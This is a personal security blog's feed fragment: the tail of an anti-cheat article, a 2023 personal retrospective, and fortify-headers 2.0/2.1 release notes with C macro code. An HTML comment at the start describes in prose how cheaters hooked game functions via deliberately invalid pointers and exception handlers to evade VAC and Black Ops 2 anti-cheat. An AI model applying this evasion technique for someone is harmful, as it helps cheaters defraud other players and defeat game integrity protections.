<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">Valorant</a>,
<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">Call of Duty: Modern Warfare 2</a>,
… those measures are indeed working pretty well,
and are likely providing better results than technical-only
measures. They are also cheaper, since steering people away from toxic
behaviours doesn't reduce the number of players as much as banning them
outright. It's nice to see that the video game industry realised that cheating and
abuses/toxicity could be addressed in similar non-technical ways, and that both
approaches are complementary. This is a stark contrast to other ones,
where techno-solutionism is seen at the only possible remedy, even more so
in our machine-learning-all-the-things era. </p>
<h2>Sources and resources</h2>
<ul>
<li><a href="https://youtube.com/watch?v=hI7V60r7Jco">Anti-Cheat for Multiplayer Games</a></li>
<li><a href="https://secret.club/">Secret Club</a></li>
<li><a href="https://unknowncheats.me/">UnKnoWnCheaTs</a></li>
</ul>
<!--
Steam's VAC was already doing basic stuff, like hashing the entire code region of the game on launch, storing the hash, and then re-hashing the code region every few minutes to see if someone had changed the code, presumably to install a trampoline and hook into the game's functions (to write aimbots, wallhacks, etc). When a hash change is detected, the player is banned.
Cheaters found a way to bypass this by simply finding the function they desired to hook and setting any random function pointer within it to 0 (stored in rw memory, so doesn't trigger the code region hash mentioned above). This would trigger an exception, which the cheat developer would catch with Windows' SEH/VEH, effectively giving them a hook into the function without having to modify the code region.
Activision's anti-cheat would then go through a bunch of function pointers (the ones in network/rendering functions mostly, since that's where you'd want to hook to write cheats) and check for null pointers. If a pointer was null, they'd ban you.
Funny enough, this was incredibly easy to bypass: just set the pointer to 1, or 2, or 3, or ...!! All of these addresses are most likely still invalid and they'll still trigger an exception, even though they're theoretically valid pointers, giving you a de-facto hook into the game that bypassed both VAC and BO2's anticheat, and was pretty much unpatchable. Perhaps that's why they started being annoying and banning people for running IDA, Cheat Engine, etc., which are certainly probable indicators but definitely not hard evidence for cheats.
--></content><category term="games"></category></entry><entry><title>2023 in retrospect</title><link href="https://dustri.org/b/2023-in-retrospect.html" rel="alternate"></link><published>2023-12-31T23:59:00+01:00</published><updated>2023-12-31T23:59:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-12-31:/b/2023-in-retrospect.html</id><summary type="html"><p>In 2023, I did, amongst other things:</p>
<ul>
<li>Donated some money:<ul>
<li>$400 to <a href="https://fsfe.org/">FSFE</a></li>
<li>$5000 to <a href="https://noyb.eu">NOYB</a></li>
<li>$5000 to <a href="https://riseup.net">Riseup</a></li>
<li>$5000 to the <a href="https://archive.org">Internet Archive</a></li>
<li>$5000 to the <a href="https://en.wikipedia.org/wiki/Planned_Parenthood">Planned Parenthood Federation of America</a></li>
<li>$1000 to <a href="https://daysforgirls.org">days for girls</a>, on the advice of <a href="https://foreignbystander.com/">chik</a> from <a href="https://darkscience.net">darkscience</a>.</li>
<li>$200 each, as a <a href="https://opensource.googleblog.com/search/label/peer%20bonus">Open Source …</a></li></ul></li></ul></summary><content type="html"><p>In 2023, I did, amongst other things:</p>
<ul>
<li>Donated some money:<ul>
<li>$400 to <a href="https://fsfe.org/">FSFE</a></li>
<li>$5000 to <a href="https://noyb.eu">NOYB</a></li>
<li>$5000 to <a href="https://riseup.net">Riseup</a></li>
<li>$5000 to the <a href="https://archive.org">Internet Archive</a></li>
<li>$5000 to the <a href="https://en.wikipedia.org/wiki/Planned_Parenthood">Planned Parenthood Federation of America</a></li>
<li>$1000 to <a href="https://daysforgirls.org">days for girls</a>, on the advice of <a href="https://foreignbystander.com/">chik</a> from <a href="https://darkscience.net">darkscience</a>.</li>
<li>$200 each, as a <a href="https://opensource.googleblog.com/search/label/peer%20bonus">Open Source Peer Bonus</a>, courtesy of Google, to<ul>
<li><a href="https://github.com/richfelker/">Rich Felker</a> for their work on <a href="https://musl.libc.org">musl</a>.</li>
<li><a href="https://mxxn.io/">Blaž Hrastnik</a> for their work on <a href="https://helix-editor.com">Helix</a>.</li>
<li><a href="https://github.com/justinmk">Justin Keyes</a> for their work on <a href="https://neovim.io">Neovim</a>.</li>
<li><a href="https://github.com/jeanas">Jean Abou-Samra</a> for their work on <a href="https://pygments.org">Pygments</a>.</li>
</ul>
</li>
</ul>
</li>
<li>Read a couple of books:<ul>
<li><a href="https://en.wikipedia.org/wiki/The_Killer_(comics)">Le tueur</a></li>
<li>Some <a href="https://en.wikipedia.org/wiki/Warhammer_40,000">Warhammer 40,000</a>:<ul>
<li><a href="https://wh40k.lexicanum.com/wiki/Sons_of_the_Hydra_(Novel)">Sons of the Hydra</a>, neat.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Anthology)">Dark Imperium (Anthology)</a></li>
<li><a href="https://wh40k.lexicanum.com/wiki/Shroud_of_Night_(Novel)">Shroud of Night</a>, forgettable.</li>
<li>The <a href="https://wh40k.lexicanum.com/wiki/Black_Legion_(Novel_Series)">Black Legion</a> duology, solid.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/Renegades:_Harrowmaster_(Novel)">Renegades: Harrowmaster</a>, witty.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Kingmaker_(Novel)">Assassinorum: Kingmaker</a>, decent.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/Night_Lords_(Novel_Series)">Night Lords: The Omnibus</a>, outstanding.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_Deacon_of_Wounds_(Novel)">The Deacon of Wounds</a> great writing style.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Execution_Force_(Novel)">Assassinorum: Execution force</a>, forgettable.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_Infinite_and_the_Divine_(Novel)">The Infinite and the Divine</a>, highly entertaining.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_I_(Novel)">The End and the Death vol. 1</a>, a <em>teensy</em> bit over the top.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_II_(Novel)">The End and the Death vol. 2</a>, almost there, almost there, ...</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_Macharian_Crusade_(Novel_Series)">The Macharian Crusade Omnibus</a>, a writing style a tad heavy.</li>
<li>The <a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Novel_Series)">Dark Imperium</a> trilogy, nice to see the setting moving forward!</li>
<li>The first 5 tomes of the <a href="https://wh40k.lexicanum.com/wiki/Dawn_of_Fire_(Novel_Series)">Dawn of Fire</a> heptalogy, definitely a series of books.</li>
<li><a href="https://wh40k.lexicanum.com/wiki/The_Lion:_Son_of_the_Forest_(Novel)">The Lion: Son of the Forest</a>, I've seen Dragon Balls episodes with a quicker pace.</li>
<li>Finished the <a href="https://wh40k.lexicanum.com/wiki/The_Beast_Arises_(Novel_Series)">Beast Arises</a>
dodecalogy. The last chapter of the final book deserved a book on its own,
instead of being speedrunned in ~30 pages.</li>
</ul>
</li>
<li><a href="https://en.wikipedia.org/wiki/It%27s_OK_to_Be_Angry_About_Capitalism">It's OK to Be Angry About Capitalism</a></li>
<li><a href="https://nostarch.com/hacks-leaks-and-revelations">Hacks, Leaks, and Revelations</a>: a <a href="https://dustri.org/b/book-review-hacks-leaks-and-revelations.html">reference</a></li>
<li><a href="https://direct.mit.edu/books/book/3008/Beyond-ChoicesThe-Design-of-Ethical-Gameplay">Beyond choices: The design of ethical gameplay</a></li>
<li><a href="https://editions-ixe.fr/catalogue/non-le-masculin-ne-lemporte-pas-sur-le-feminin-ned/">Non, le masculin ne l’emporte pas sur le féminin !</a></li>
<li><a href="https://en.wikipedia.org/wiki/This_Changes_Everything_(book)">This Changes Everything: Capitalism vs. the Climate</a></li>
<li><a href="https://www.goodreads.com/en/book/show/51176626">Break 'em Up: Recovering Our Freedom from Big Ag, Big Tech, and Big Money</a>.</li>
<li><a href="https://aosabook.org/en/buy.html">The Performance of Open Source Applications</a>: contains some really nice tidbits.</li>
<li><a href="https://aosabook.org/en/">The Architecture of Open Source Applications, Part 1.</a>: computers were a mistake.</li>
<li><a href="https://nostarch.com/kill-it-fire">Kill It with Fire: Manage Aging Computer Systems (and Future Proof Modern Ones)</a></li>
<li><a href="https://goodreads.com/book/show/38212110-technically-wrong">Technically Wrong: Sexist Apps, Biased Algorithms, and Other Threats of Toxic Tech</a></li>
<li><a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Cracking</a>: <a href="https://dustri.org/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html">great</a></li>
<li><a href="https://freakyclown.com/publications">How I Rob Banks (and other such places)</a>, written in an unbearably cocky style, mildly entertaining.</li>
<li><a href="https://samleecole.com">How Sex Changed the Internet and the Internet Changed Sex: An Unexpected History</a>, a bit too shallow for my taste.</li>
<li><a href="https://toddrose.com/endofaverage">The End of Average</a>, great book, except the part where the author argues that the goal of schools is to prepare kids for jobs.</li>
<li><a href="https://staffeng.com/book">Staff Engineer: Leadership beyond the management track</a>, I'm not there yet, but it helped me understand some coworker's jobs and struggles.</li>
<li><a href="https://thirdeditions.com/en/sagas/94-metal-gear-solid-hideo-kojima-s-magnum-opus-9791094723616.html">Metal Gear Solid. Hideo Kojima's Magnum Opus</a>:
deluge of superlatives directed at Kojima, speculative opinionated wild rambling, no mention of the <a href="https://en.wikipedia.org/wiki/Quiet_(Metal_Gear)">rampant</a>
<a href="https://theguardian.com/technology/2014/apr/09/metal-gear-solid-ground-zeroes-sexual-violence">sexism</a>,
typos and frenchisms, … prefer the <a href="https://en.wikipedia.org/wiki/Metal_Gear">wikipedia</a> and <a href="https://metalgear.fandom.com/wiki/Metal_Gear_Wiki">fandom</a> pages instead.</li>
<li><a href="https://en.wikipedia.org/wiki/The_Mirage_(Ruff_novel)">The Mirage</a>: I
was expecting more of a description of an alternative history than a
novel with a lame plot and forgettable characters. The humour is goofy
and unsubtle: a punk rock group called Green Desert has an anti-war
anthem named "Arabian Idiot"; a morning talk show called Jazeera &amp;
Friends, … but this is completely on par with the post-11-September
anti-muslim/Iraqi rhetoric, making it both funny and perfectly adequate.</li>
</ul>
</li>
<li>Moved back to France.</li>
<li>Volunteered at a library.</li>
<li>Refused to sell <a href="https://websec.fr">websec.fr</a></li>
<li>Listened to <a href="https://listenbrainz.org/user/jvoisin/year-in-music/">some music</a>.</li>
<li>Attended some concerts:<ul>
<li><a href="https://en.wikipedia.org/wiki/Eisbrecher">Eisbrecher</a>, along with <a href="https://maerzfeld.de">Maerzfeld</a></li>
<li><a href="https://gojira-music.com">Gojira</a>, along with <a href="https://alienweaponry.com">Alien Weaponry</a></li>
<li><a href="https://katatonia.com">Katatonia</a>, along with
<a href="https://som.band">SOM</a> and <a href="https://solstafir.net">Sólstafir</a></li>
<li><a href="https://heavenshallburn.com">Heaven Shall Burn</a>, along with
<a href="https://trivium.org">Trivium</a>,
<a href="https://en.wikipedia.org/wiki/Malevolence_(band)">Malevolence</a>, and
<a href="https://obituary.cc">Obituary</a></li>
<li><a href="https://igorrr.com">Igorrr</a>, along with
<a href="https://derwegeinerfreiheit.de">Der Weg einer Freiheit</a>,
<a href="https://en.wikipedia.org/wiki/Amenra">Amenra</a>, and
<a href="http://hangmanschair.com">Hangman's Chain</a></li>
</ul>
</li>
<li>Played some video games:<ul>
<li>On a computer:<ul>
<li><a href="https://www.doomworld.com/forum/topic/134292-myhousewad/">MyHouse.WAD</a>: <a href="https://doomwiki.org/wiki/My_House">wow</a>.</li>
<li><a href="https://en.wikipedia.org/wiki/Observer_(video_game)">&gt;observer_</a>: didn't like it.</li>
<li><a href="https://en.wikipedia.org/wiki/Sea_of_Thieves">Sea of Thieves</a>, ~ok with friends.</li>
<li><a href="https://hyperstrange.com/our-games/blood-west/">Blood West</a>: <a href="https://en.wikipedia.org/wiki/Thief_(series)">Thief</a> in the Far West.</li>
<li><a href="https://en.wikipedia.org/wiki/Half-Life%3A_Alyx">Half Life: Alyx</a>: impressive in every way.</li>
<li><a href="https://en.wikipedia.org/wiki/High_on_Life_(video_game)">High on Life</a>: excruciatingly tedious at best.</li>
<li><a href="https://en.wikipedia.org/wiki/Cyberpunk_2077#Cyberpunk_2077:_Phantom_Liberty">Cyberpunk 2077: Phantom Liberty</a>: glorious.</li>
<li><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six: Siege</a>: better than <a href="https://en.wikipedia.org/wiki/Counter-Strike">Counter Strike</a>.</li>
<li><a href="https://en.wikipedia.org/wiki/Hogwarts_Legacy">Hogwarts Legacy</a>: breathtaking and well rounded.</li>
<li><a href="https://store.steampowered.com/app/2329130/Rewind_Or_Die/">Rewind or Die</a> felt like playing resident evil again &lt;3</li>
<li><a href="https://en.wikipedia.org/wiki/Outer_Wilds">Outer Wilds</a>: the controls were too terrible for me to play.</li>
<li><a href="https://en.wikipedia.org/wiki/The_Last_of_Us_Part_I">The Last of Us Part 1</a>: ok-ish, not my jam, Joel is a moron.</li>
<li><a href="https://en.wikipedia.org/wiki/The_Witcher_3%3A_Wild_Hunt">The Witcher 3 - Wild Hunt</a>: when did video game get so long…</li>
<li><a href="https://en.wikipedia.org/wiki/Apex_Legends">Apex Legends</a>: a lame version of <a href="https://en.wikipedia.org/wiki/Titanfall_2">Titanfall 2</a>, ok-ish when playing ranked.</li>
<li><a href="https://en.wikipedia.org/wiki/Warhammer_40,000:_Chaos_Gate_-_Daemonhunters">Warhammer 40,000: Chaos Gate - Daemonhunters</a>:
<a href="https://en.wikipedia.org/wiki/XCOM">XCOM</a> with <a href="https://wh40k.lexicanum.com/wiki/Grey_Knights">Grey knights</a>.</li>
<li><a href="https://en.wikipedia.org/wiki/Metal%3A_Hellsinger">Metal: Hellsinger</a>: looked super-lame on gameplay videos, but was surprisingly fun.</li>
<li><a href="https://en.wikipedia.org/wiki/Starfield_(video_game)">Starfield</a>: a buggy clunky quickly-boring
<a href="https://en.wikipedia.org/wiki/The_Elder_Scrolls_V:_Skyrim">Skyrim</a> in space, quickly went back to Cyberpunk 2077.</li>
<li><a href="https://store.steampowered.com/app/1172650/INDUSTRIA/">Industria</a>: catastrophic performances for looking utterly terrible, along with a clunky feeling, promptly uninstalled.</li>
<li><a href="https://en.wikipedia.org/wiki/Journey_to_the_Savage_Planet">Journey to the Savage Planet</a>: Rich in poop-oriented
jokes, trying hard to be funny and maybe even subversive but systematically falling flat.</li>
<li><a href="https://en.wikipedia.org/wiki/Baldur%27s_Gate_3">Baldur's Gate 3</a>: not a
fan of the <a href="https://en.wikipedia.org/wiki/Dungeons_%26_Dragons">Dungeons &amp; Dragons</a> dice-based
gameplay, nor of the hard dialog choices cutting entire parts of the game,
but still an amazing game.</li>
<li><a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Definitive Experience</a>,
so <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_Ground_Zeroes">Metal Gear Solid V: Ground Zeroes</a> and
<a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Phantom Pain</a>.
I bought it after having seen the former being run at the <a href="https://gamesdonequick.com/tracker/run/5506">AGDQ 2023</a>.
Truly amazing game overall, except for the <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain#Portrayal_of_Quiet">sexualisation of the <em>sole</em> female character</a>.</li>
</ul>
</li>
<li>On a (glorious) <a href="https://en.wikipedia.org/wiki/Steam_Deck">Steam Deck</a>:<ul>
<li><a href="https://store.steampowered.com/app/638990/UNDYING/">UNDYING</a>: nice
zombie-related game.</li>
<li><a href="https://store.steampowered.com/agecheck/app/1593500/">God of War</a>,
surprisingly "wholesome".</li>
<li><a href="https://blacksaltgames.com/">Dredge</a>, terrific indie game: gorgeous looking, simple yet gripping gameplay, interesting lore and story, …</li>
<li><a href="https://en.wikipedia.org/wiki/Vampyr_(video_game)">Vampyr</a>, because
I miss <a href="https://en.wikipedia.org/wiki/Vampire:_The_Masquerade_%E2%80%93_Bloodlines">Vampire: The Masquerade – Bloodlines</a>. It could have been so much more instead of being "meh".</li>
</ul>
</li>
</ul>
</li>
<li>Ported <a href="https://github.com/jvoisin/snuffleupagus">Snuffleupagus</a> to PHP8.3.</li>
<li>Contributed to a couple of software:<ul>
<li><a href="https://github.com/lite-xl/lite-xl/pulls?q=is%3Apr+author%3Ajvoisin">lite-xl</a></li>
<li><a href="https://alpinelinux.org/">Alpine linux</a>, by:<ul>
<li>becoming a <a href="https://pkgs.alpinelinux.org/packages?branch=edge&amp;repo=&amp;arch=&amp;maintainer=Julien%20Voisin">package maintainer</a></li>
<li><a href="https://gitlab.alpinelinux.org/alpine/tsc/-/issues/64">documenting a bit</a> the compiler-based mitigations,
and <a href="https://gitlab.alpinelinux.org/alpine/abuild/-/merge_requests/221">enabling some missing ones</a>.</li>
</ul>
</li>
<li>Because of <a href="https://runzero.com">runZero</a>, I<ul>
<li><a href="https://github.com/rapid7/recog/pulls?q=+is%3Apr+author%3Ajvoisin">contributed to recog</a> to improve some of its fingerprints;</li>
<li><a href="https://github.com/Sonarr/Sonarr/issues/5601">made it less trivial</a> to detect Sonarr/Lidarr/Radarr/… versions.</li>
</ul>
</li>
<li><a href="https://github.com/struct/isoalloc/pulls?q=is%3Apr+author%3Ajvoisin+created%3A2023">isoalloc</a></li>
<li><a href="https://github.com/pygments/pygments/commits?author=jvoisin">pygments</a>, mainly by adding lexers.</li>
<li><a href="https://github.com/morpheus65535/bazarr/pull/2304">bazaar</a>, making it work on Alpine Linux.</li>
<li><a href="https://github.com/google/oss-fuzz/pulls?q=is%3Apr+author%3Ajvoisin">oss-fuzz</a>,
including some <a href="https://github.com/guidovranken/python-library-fuzzers/pulls?q=is%3Apr+author%3Ajvoisin">python fuzzers</a>.</li>
<li><a href="https://github.com/daanx/mimalloc-bench">mimalloc-bench</a>,
resulting in some <a href="https://github.com/microsoft/snmalloc/pull/587#issuecomment-1442077886">real world improvements</a>.</li>
<li><a href="https://github.com/quodlibet/mutagen/pulls/jvoisin">mutagen</a>, since it's
used by <a href="https://0xacab.org/jvoisin/mat2">mat2</a>. I even <a href="https://github.com/google/oss-fuzz/pull/10072">integrated it into
OSS-Fuzz</a>.</li>
<li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is%3Apr+jvoisin">metasploit</a>,
by doing a lot of code reviews for pull-requests, and landing some modules,
like a <a href="https://github.com/rapid7/metasploit-framework/pull/17711">SPIP RCE</a>,
courtesy of <a href="https://thinkloveshare.com/">Laluka</a> and <a href="https://twitter.com/coiffeur0x90">coiffeur</a>.</li>
<li><a href="https://chrony.tuxfamily.org/">chrony</a>, spending some time debugging
<a href="https://mail-archive.com/chrony-dev@chrony.tuxfamily.org/msg02572.html">how to enable its seccomp sandbox</a>
on Alpine Linux, resulting in a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/issues/14891#note_316587">couple of improvements</a>,
and of course a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/47087">now-enabled-by-default sandbox</a> there.</li>
</ul>
</li>
<li>Got a CVE for a bug I <a href="https://github.com/py-pdf/pypdf/security/advisories/GHSA-jrm6-h9cq-8gqw">reported</a> in 2020!</li>
<li>Kept maintaining <a href="https://openmw.org">OpenMW</a>'s infrastructure.</li>
<li>Learnt some <a href="https://en.wikipedia.org/wiki/Rust_(programming_language)">Rust</a> so I could hang out with the cool kids.</li>
<li>Helped organise the <a href="http://g.co/ctf">GoogleCTF</a>, which was <a href="https://ctftime.org/event/1929">pretty well received</a>.</li>
<li>Added more possible subtitles to this blog, bringing their numbers above 1100.</li>
<li>Reduced the size of this website's webpages; most should now be around 10kb.</li>
<li>Contributed a bit to Wikipedia, in <a href="https://en.wikipedia.org/wiki/Special:Contributions/jvoisin">English</a> and in <a href="https://fr.wikipedia.org/wiki/Sp%C3%A9cial:Contributions/jvoisin">French</a>
under my usual nickname.</li>
<li>Moved my emails away from <a href="https://gandi.net">Gandi</a> over to <a href="https://migadu.com">Migadu</a>,
given their <a href="https://chatting.neocities.org/posts/2023-gandi-pricing">ludicrous</a> post-acquisition price increase.</li>
<li><a href="https://github.com/jvoisin/compiler-flags-distro">Investigated</a> what
hardening-related compiler flags where enabled by default by popular Linux
distributions.</li>
<li><a href="https://tests.stockfishchess.org/users#jvoisin">Contributed a bit</a> (by crunching numbers) to <a href="https://stockfishchess.org/">Stockfish</a>,
an open-source chess engine with an <a href="https://en.wikipedia.org/wiki/Elo_rating_system">Elo rating</a>
around <a href="https://computerchess.org.uk/ccrl/4040/rating_list_all.html">3500</a>.</li>
<li>Got featured a couple of times on Hackernew/reddit/lobste.rs/… frontpage,
thanks to a <s><a href="https://www.reddit.com/r/karma/wiki/index/faq/">karma</a> junkie</s>
marketing-able <a href="https://dijit.sh">friend</a></li>
<li>Kept maintaining <a href="https://nos-oignons.net/">Nos Oignons</a>'s infrastructure with <a href="https://corl3ss.com/">corl3ss</a>.
We're back at handling <a href="https://nos-oignons.net/Services/index.en.html">around 2%</a>
of tor's exit traffic! Our little non-profit is now 10 years old.</li>
<li><a href="https://github.com/jvoisin/fortify-headers">Took over</a> the development and maintenance of
<a href="https://u.2f30.org/sin/">sin</a>'s <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>.
It's used by <a href="https://openwrt.org/">OpenWrt</a>, <a href="https://www.alpinelinux.org/">Alpine Linux</a>,
and <a href="https://bugs.gentoo.org/546692">soon</a> in <a href="https://wiki.gentoo.org/wiki/Project:Musl">Gentoo Hardened's musl flavour</a>.</li>
<li>Ported my resume/cover letter template from
<a href="https://latex-project.org">LaTeX</a> to
<a href="https://typst.app/docs/guides/guide-for-latex-users/">typst</a> and felt so
much joy purging away all the LaTeX/TeXLive/XeTeX/LuaTeX/… garbage from my computer,
to never have to touch it again.</li>
<li>Got a "Documented Feedback from Employee Relations" from HR at work for
saying "Awkward to have yet another middle aged rich white het guy come talk
about diversity and inclusion." on an internal chatroom, about <a href="https://booleanblackbelt.com/who-is-the-boolean-black-belt/">this middle
aged rich white het guy</a>
invited to give an internal talk about diversity and inclusion.</li>
</ul></content><category term="misc"></category></entry><entry><title>fortify-headers 2.1</title><link href="https://dustri.org/b/fortify-headers-21.html" rel="alternate"></link><published>2023-12-16T20:30:00+01:00</published><updated>2023-12-16T20:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-12-16:/b/fortify-headers-21.html</id><summary type="html"><p>Only 4 days after the <a href="https://dustri.org/b/fortify-headers-20.html">release</a> of
<a href="https://github.com/jvoisin/fortify-headers">fortify-headers</a>,
here is the <a href="https://github.com/jvoisin/fortify-headers/releases/tag/2.1">2.1</a>,
fixing a couple of portability issues and tidying a bit the code.
<a href="https://chimera-linux.org/">Chimera Linux</a> users are
<a href="https://github.com/chimera-linux/cports/commit/a26be649d8a13c1012d5e165055d354a6bab1af8">as of today</a>
<del>test driving</del> benefiting from it.</p>
<h2>Changelog</h2>
<ul>
<li>Remove superfluous includes from the headers</li>
<li>Put some functions in to their …</li></ul></summary><content type="html"><p>Only 4 days after the <a href="https://dustri.org/b/fortify-headers-20.html">release</a> of
<a href="https://github.com/jvoisin/fortify-headers">fortify-headers</a>,
here is the <a href="https://github.com/jvoisin/fortify-headers/releases/tag/2.1">2.1</a>,
fixing a couple of portability issues and tidying a bit the code.
<a href="https://chimera-linux.org/">Chimera Linux</a> users are
<a href="https://github.com/chimera-linux/cports/commit/a26be649d8a13c1012d5e165055d354a6bab1af8">as of today</a>
<del>test driving</del> benefiting from it.</p>
<h2>Changelog</h2>
<ul>
<li>Remove superfluous includes from the headers</li>
<li>Put some functions in to their proper files</li>
<li>Add a missing include in <code>sys/select.h</code></li>
<li>Do not use static inline for C++ to avoid <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">ODR</a>-wise violation</li>
<li>Guard some conditional stdio APIs with the right macros</li>
<li>Fix a typo that would prevent C++ code from compiling correctly</li>
<li>Rename macros to be more namespace-friendly</li>
</ul>
<h2>Implementation details</h2>
<p>Including parts from the
<a href="https://en.wikipedia.org/wiki/Standard_library">stdlib</a> in fortify means that
programs that don't correctly include everything they need might compile, even
though they shouldn't. Fortunately, the only bits used are either:</p>
<ul>
<li><code>size_t</code>, which can be obtained by using <code>typeof(sizeof(char))</code>,
since it's by definition the type returned by <code>sizeof</code>.</li>
<li>constants like <code>PATH_MAX</code> (that we can define to <code>4096</code>), <code>MB_LEN_MAX</code>
(defined as 16), ...</li>
<li>eldritch constructs like <a href="https://www.man7.org/linux/man-pages/man3/MB_CUR_MAX.3.html"><code>MB_CUR_MAX</code></a>,
whose usage we hide behind an <code>#ifdef</code>.</li>
</ul>
<p>The other big thing is the one caught by <a href="https://github.com/ssbr">Devin Jeanpierre</a>, the usage of <code>static
inline</code> while <a href="https://en.cppreference.com/w/c/language/inline">absolutely alright in C</a>,
is problematic in C++, because of the <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">One Definition Rule</a>:
In C++, if a function is declared inline, it must be declared inline in every translation unit, and also every
definition of an inline function must be exactly the same (while in C they may
be different.) On the other hand, C++ allows non-const function-local
statics and all function-local statics from different definitions of an inline
function are the same in C++, but distinct in C.
More practically, calling <code>FORTIFY_INLINE</code> functions from an inline function in C++, and including
the header defining that inline function in more than one <a href="https://en.wikipedia.org/wiki/Translation_unit_%28programming%29">translation
unit</a> results
in undefined behaviour. The fix is easy, and was
<a href="https://github.com/jvoisin/fortify-headers/commit/c607773a80e6685ab4c922245c33cf2ea5dcfb72">commited</a>
by <a href="https;//github.com/q66">q66</a>: use <code>static</code> instead of <code>static inline</code> in C++.</p>
<p>Thanks <a href="https://github.com/ssbr">Devin Jeanpierre</a> for spending time to look at
C++ compatibility, <a href="https://github.com/q66">q66</a> for his patches, willingness to ship
fortify-headers in Chimera, and becoming co-maintainer.</p></content><category term="security"></category></entry><entry><title>fortify-headers 2.0</title><link href="https://dustri.org/b/fortify-headers-20.html" rel="alternate"></link><published>2023-12-12T23:30:00+01:00</published><updated>2023-12-12T23:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-12-12:/b/fortify-headers-20.html</id><summary type="html"><p>8 months ago, I started to contribute to <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>,
a standalone <a href="https://gcc.gnu.org/legacy-ml/gcc-patches/2004-09/msg02055.html">fortify-source</a> implementation,
with the goal of implementing <code>FORTIFY_SOURCE=3</code>, since the current version
only implemented <code>FORTIFY_SOURCE=2</code>. I reached out to
<a href="https://u.2f30.org/sin/">sin</a>, the original maintainer, to ask if he was
interested in my changes, and he told me the …</p></summary><content type="html"><p>8 months ago, I started to contribute to <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>,
a standalone <a href="https://gcc.gnu.org/legacy-ml/gcc-patches/2004-09/msg02055.html">fortify-source</a> implementation,
with the goal of implementing <code>FORTIFY_SOURCE=3</code>, since the current version
only implemented <code>FORTIFY_SOURCE=2</code>. I reached out to
<a href="https://u.2f30.org/sin/">sin</a>, the original maintainer, to ask if he was
interested in my changes, and he told me the project wasn't maintained
anymore. But he would be happy to give me the commit bit instead. I spent
some months <a href="https://github.com/jvoisin/fortify-headers">writing code</a> before
accepting, to see if it would be a good idea: Would I be able to maintain it?
To improve it? Add more features? and so on. Turns out the answer is yes, and
I'm thus happy to announce the immediate availability of <a href="https://git.2f30.org/fortify-headers/refs.html">fortify-headers
2.0</a>!</p>
<h2>Changelog</h2>
<ul>
<li>Added clang support, based on <a href="https://github.com/q66">q66</a>'s patches.</li>
<li>Fixed a 64b-related incompatibility around <code>ppoll</code> </li>
<li>Added a ton of tests, with <a href="https://jvoisin.github.io/fortify-headers/">around 90% of coverage</a></li>
<li>Made use of <code>__builtin_dynamic_object_size</code> when <code>FORTIFY_SOURCE=3</code> is used,
instead of <code>__builtin_object_size</code>.</li>
<li>Made use of <a href="https://clang.llvm.org/docs/AttributeReference.html">attributes</a>:
<a href="https://clang.llvm.org/docs/AttributeReference.html#alloc-size">alloc_size</a>,
<a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-as-builtin">diagnose_as_builtin</a>,
<a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-if">diagnose_if</a>,
<a href="https://clang.llvm.org/docs/AttributeReference.html#format">format</a>,
<a href="https://clang.llvm.org/docs/AttributeReference.html#malloc">malloc</a>,
<a href="https://clang.llvm.org/docs/AttributeReference.html#nodiscard-warn-unused-result">warn_unused_result</a>,
…</li>
<li>Added some missing functions, like <code>calloc</code>, <code>fdopen</code>, <code>fmemopen</code>, <code>fprintf</code>,
<code>malloc</code>, <code>memchr</code>, <code>popen</code>, <code>printf</code>, <code>qsort</code>, <code>umask</code>, …</li>
<li>Added continuous integration, both on clang and gcc, covering the whole range
of supported versions across the latest Ubuntu LTS.</li>
</ul>
<h2>Implementation details</h2>
<p>Since this is a pretty uncommon piece of software, friends of mine have been
asking me details about the involved black magic.
While it's possible to overload functions with the
<a href="https://clang.llvm.org/docs/AttributeReference.html#overloadable">overloadable</a>
attribute in C, there isn't really something similar for drive-by overloading.
Fortunately, it's possible to hack an equivalent by combining
<a href="https://gcc.gnu.org/onlinedocs/cpp/Wrapper-Headers.html"><code>#include_next</code></a> with
the following macros:</p>
<div class="codehilite"><pre><span></span><code><span class="cp">#define _FORTIFY_STR(s) #s</span>
<span class="cp">#define _FORTIFY_ORIG(p, fn) __typeof__(fn) __orig_##fn __asm__(_FORTIFY_STR(p) #fn)</span>
<span class="cp">#define _FORTIFY_FNB(fn) _FORTIFY_ORIG(__USER_LABEL_PREFIX__, fn)</span>
<span class="cp">#define _FORTIFY_FN(fn) _FORTIFY_FNB(fn); _FORTIFY_INLINE</span>
